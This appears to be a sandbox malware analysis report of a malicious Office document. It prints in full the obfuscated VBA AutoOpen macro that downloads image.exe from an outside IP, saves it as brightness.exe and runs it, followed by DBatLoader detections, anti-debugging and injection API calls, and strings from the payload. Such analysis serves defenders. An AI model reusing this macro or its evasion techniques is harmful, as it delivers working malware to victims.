Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:59:24
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\brightness.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\brightness.exe
Imagebase:	0x400000
File size:	1'161'216 bytes
MD5 hash:	483AB6BD562B28782D0999ABEC4F57F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.3375169126.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.3359324067.00000000022D6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
AutoOpenAPIs: 6, Strings: 20, Number of lines: 59, Relevance: 70.059

APIs	Meta Information
CreateObject	CreateObject("MSXML2.ServerXMLHTTP")
CreateObject	CreateObject("Adodb.Stream")
Open	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)
Send
responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?
Shell	Shell(""brightness.exe"") -> 7972

Strings	Decrypted Strings
"M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
"Ad""od""b.S""tr""ea""m"
"h"
"t"
"t""p:/""/147.124.216.113/image"
"."
"e"
"x"
"e"
"GET"
"brightness"
"."
"e"
"x"
"e"
"""brightness"
"."
"e"
"x"
"e"""

Line	Instruction	Meta Information
9	Sub AutoOpen()
11	Dim xHttp	executed
16	Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")	CreateObject("MSXML2.ServerXMLHTTP") executed
18	Dim bStrm
20	Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")	CreateObject("Adodb.Stream") executed
24	Dim nirm1
25	nirm1 = "h"
26	Dim nirm2
27	nirm2 = "t"
28	Dim nirm3
29	nirm3 = "t" & "p:/" & "/147.124.216.113/image"
30	Dim nirm4
31	nirm4 = "."
32	Dim nirm5
33	nirm5 = "e"
34	Dim nirm6
35	nirm6 = "x"
36	Dim nirm7
37	nirm7 = "e"
41	Dim plpl
42	plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7
45	xHttp.Open "GET", plpl, False	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False) executed
46	xHttp.Send	Send
52	With bStrm
53	. Type = 1
54	. Open
55	. write xHttp.responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00? executed
59	Dim monu1
60	monu1 = "brightness"
61	Dim monu2
62	monu2 = "."
64	Dim monu3
65	monu3 = "e"
67	Dim monu4
68	monu4 = "x"
70	Dim monu5
71	monu5 = "e"
73	Dim monu6
74	monu6 = monu1 & monu2 & monu3 & monu4 & monu5
77	. savetofile monu6, 2
80	Dim parveen1
81	Dim parveen2
82	Dim parveen3
83	Dim parveen4
84	Dim praveen1
85	praveen1 = """brightness"
86	Dim praveen2
87	praveen2 = "."
89	Dim praveen3
90	praveen3 = "e"
92	Dim praveen4
93	praveen4 = "x"
95	Dim praveen5
96	praveen5 = "e"""
101	Dim praveen6
102	praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
106	End With
108	Shell (praveen6)	Shell(""brightness.exe"") -> 7972 executed
110	End Sub

Reset < >

Analysis Process: brightness.exePID: 7972, Parent PID: 7244COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14.6%
Total number of Nodes:	268
Total number of Limit Nodes:	15

Executed Functions

Function 0290F0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InetIsOffline.URL(00000000,00000000,0291B3D5,?,?,?,000002F7,00000000,00000000), ref: 0290F0E2

Part of subcall function 0290881C: LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
Part of subcall function 0290881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
Part of subcall function 0290881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879
Part of subcall function 0290881C: FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3

Part of subcall function 0290EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0290F3CC,UacInitialize,0295237C,0291B40C,UacScan,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString), ref: 0290EFCE
Part of subcall function 0290EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290EFE0

Part of subcall function 0290F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F034
Part of subcall function 0290F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F046
Part of subcall function 0290F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F05D

Part of subcall function 028F7E10: GetFileAttributesA.KERNEL32(00000000,?,0290FD00,ScanString,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString,0295237C,0291B40C,UacScan,0295237C,0291B40C,UacInitialize), ref: 028F7E1B

Part of subcall function 028FC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A468C8,?,02910032,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession), ref: 028FC2FB

Part of subcall function 0290DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E01F
Part of subcall function 0290DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E04F
Part of subcall function 0290DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290E064
Part of subcall function 0290DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290E090
Part of subcall function 0290DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290E099

Part of subcall function 028F7E34: GetFileAttributesA.KERNEL32(00000000,?,02912E7D,ScanString,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,Initialize), ref: 028F7E3F

Part of subcall function 028F7FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0291301B,OpenSession,0295237C,0291B40C,ScanString,0295237C,0291B40C,Initialize,0295237C,0291B40C,ScanString,0295237C,0291B40C), ref: 028F7FD5

Part of subcall function 0290DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DFD2), ref: 0290DF3F
Part of subcall function 0290DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DF79
Part of subcall function 0290DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DFA6
Part of subcall function 0290DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DFAF

Part of subcall function 02908798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize,029523A4,0290A774,UacScan), ref: 029087AC
Part of subcall function 02908798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029087C6
Part of subcall function 02908798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize), ref: 02908802

Part of subcall function 02908704: LoadLibraryW.KERNEL32(amsi), ref: 0290870D
Part of subcall function 02908704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0290876C

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,0291B764), ref: 02914DEB

Part of subcall function 0290DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0290DEA0
Part of subcall function 0290DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DEF2), ref: 0290DEB6
Part of subcall function 0290DE78: NtDeleteFile.NTDLL(?), ref: 0290DED5

MoveFileA.KERNEL32(00000000,00000000), ref: 02914FEB
MoveFileA.KERNEL32(00000000,00000000), ref: 02915041

Strings

C:\Windows\System32\, xrefs: 0290FCEB, 029174EF, 02918237
SLGetGenuineInformation, xrefs: 029199CE
CryptSIPGetSignedDataMsg, xrefs: 0290F6DB
EnumServicesStatusExA, xrefs: 0291A52F
DlpNotifyPreDragDrop, xrefs: 02919FAC
OpenSession, xrefs: 0290F117, 0290F243, 0290FBF3, 0290FD14, 0290FE21, 0290FF39, 0291030D, 029104AB, 02910651, 02910771, 02910906, 029109FE, 02910BEB, 02910D91, 029110BF, 029112ED, 02911461, 02911584, 02911702, 02911AA8, 02911B2B, 02911C43, 02911D5B, 02911E67, 02912085, 029121A2, 02912441, 029124BD, 029126D2, 02912872, 02912BB4, 02912D6F, 02912F89, 029130A3, 029133D3, 02913872, 029139EB, 02913B6E, 02913FAB, 02914209, 02914343, 0291467F, 029148C7, 02914AA9, 02914B7D, 02914CE3, 02914E78, 029151B0, 0291534A, 029154EA, 0291568F, 02915803, 02915A53, 02915B07, 02915DC4, 02915EBC, 02916373, 0291664D, 029167C1, 02916957, 02916B07, 029171F0, 029173F5, 0291760E, 029176B1, 02917844, 02917C0C, 02917EA8, 029181A5, 029182FE, 029184A4, 02918631, 029187C5, 02918944, 02918A47, 02918BBB, 02918E39, 02919029, 0291931A, 029194A0, 029196D6, 029198DC, 02919AA0, 02919D8F, 02919E3E, 0291A07E, 0291A275, 0291A36D, 0291A81F, 0291ADE7
NtAlertResumeThread, xrefs: 0291A170
NtWriteVirtualMemory, xrefs: 0291AC0E
ieproxy, xrefs: 0290F3F5, 0290F41C, 0290F44C
CryptSIPVerifyIndirectData, xrefs: 0290F6A8, 02919CDA
smartscreenps, xrefs: 0290F932, 0290F965, 0290F998
WriteVirtualMemory, xrefs: 0291A704
GetProxyDllInfo, xrefs: 0290F40B
DlpCheckIsCloudSyncApp, xrefs: 02919FDF
NtGetWriteWatch, xrefs: 0291A9DD
GZmMS1j, xrefs: 0290F0F0
psapi, xrefs: 02919CBE
NtDeviceIoControlFile, xrefs: 0291A4E4
.url, xrefs: 0291590F
FX.c, xrefs: 02914B2F
CreateProcessWithLogonW, xrefs: 0291A598
UacUninitialize, xrefs: 02913152, 0291344F, 02913547, 02913D25, 029143BF
kernel32, xrefs: 0291A64F, 0291A682, 0291A6B5, 0291A6E8, 0291A71B, 0291A74E, 0291A781
NtOpenProcess, xrefs: 02918E0E
WintrustAddActionID, xrefs: 0290F517
SxTracerGetThreadContextDebug, xrefs: 02919C41, 0291A911
VirtualAllocEx, xrefs: 0291A66B
CreateProcessAsUserA, xrefs: 0291A57A
SLIsGenuineLocalEx, xrefs: 02919A34
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02913795
NtQueryInformationThread, xrefs: 0291AA43
TrustOpenStores, xrefs: 0290F4E4
bcrypt, xrefs: 0290F7A1, 0290F7D4, 0290F807, 02919E1C
NtCreateSection, xrefs: 0291AAA9
HotKey=, xrefs: 02916A65
DllGetActivationFactory, xrefs: 0290F94E
RetailTracerEnable, xrefs: 02919C0E
RtlQueryProcessDebugInformation, xrefs: 0291A502
Ntdll, xrefs: 0291A4DA, 0291A4E9, 0291A4F8, 0291A507
RtlCreateQueryDebugBuffer, xrefs: 0291A23C
dbgcore, xrefs: 02918DD7, 02918DEB
VirtualProtect, xrefs: 0291A69E
lld.SLITUTEN, xrefs: 02913EEC
DlpGetWebSiteAccess, xrefs: 0291A045
sppc, xrefs: 029199E5, 02919A18, 02919A4B, 02919A7E, 0291A98E, 0291A9C1
SLLoadApplicationPolicies, xrefs: 02919A67
C:\Users\Public\alpha.pif, xrefs: 02914F6A
ScanString, xrefs: 0290F1DF, 0290F46E, 0290F583, 0290F714, 0290F8A5, 0290FB2E, 0290FC6F, 029101F5, 02910E0D, 02910FA9, 029113E5, 02911600, 0291167C, 02911999, 02911CBF, 02911F88, 029123C5, 029127F6, 02912A06, 02912ABC, 02912DEB, 02912F0D, 029131CE, 02913619, 02914111, 02914587, 0291477C, 02915134, 029152CE, 02915613, 029159D7, 02916076, 0291685C, 029169D3, 02916A8B, 029170F8, 02917592, 029179F9, 0291801C, 02918AC3, 02918EB5, 0291929E, 0291965A, 02919958, 02919D13, 0291A0FA, 0291A2F1, 0291A89B
SLGetEncryptedPIDEx, xrefs: 0291A9AA
I_QueryTagInformation, xrefs: 02918DBE
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02913ADC
DllRegisterServer, xrefs: 0290F435, 0290F981
URL=file:", xrefs: 029168DB
LdrLoadDll, xrefs: 0291ABA8
WinHttp.WinHttpRequest.5.1, xrefs: 02911C1D
EtwEventWrite, xrefs: 0291ACA7
NtWaitForSingleObject, xrefs: 0291A1D6
tquery, xrefs: 02919C25
spp, xrefs: 02919C58, 02919C8B, 0291A928
ntdll, xrefs: 02918DAF, 02918DFF, 02918E13, 0291A187, 0291A1BA, 0291A1ED, 0291A220, 0291A253, 0291A9F4, 0291AA27, 0291AA5A, 0291AA8D, 0291AAC0, 0291AAF3, 0291AB26, 0291AB59, 0291AB8C, 0291ABBF, 0291ABF2, 0291AC25, 0291AC58, 0291AC8B, 0291ACBE
http, xrefs: 02911A09
sppwmi, xrefs: 0291A95B
EnumServicesStatusA, xrefs: 0291A511
EnumServicesStatusW, xrefs: 0291A520
EnumProcessModules, xrefs: 0291A54D
SLGetSLIDList, xrefs: 02919A01
advapi32, xrefs: 02918DC3
C:\\Users\\Public\\Libraries\\, xrefs: 02914F9A, 02914FF0, 02915CEB
CreateProcessAsUserW, xrefs: 0291A589, 0291A5A7
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 02914C82
OpenProcess, xrefs: 0291A6D1
SetUnhandledExceptionFilter, xrefs: 0291A76A
FindCertsByIssuer, xrefs: 0290F54A
C:\Users\Public\, xrefs: 029135B7, 02915904, 02916B77
NtMapViewOfSection, xrefs: 0291AADC
NtOpenSection, xrefs: 0291AA76
BCryptQueryProviderRegistration, xrefs: 0290F7BD
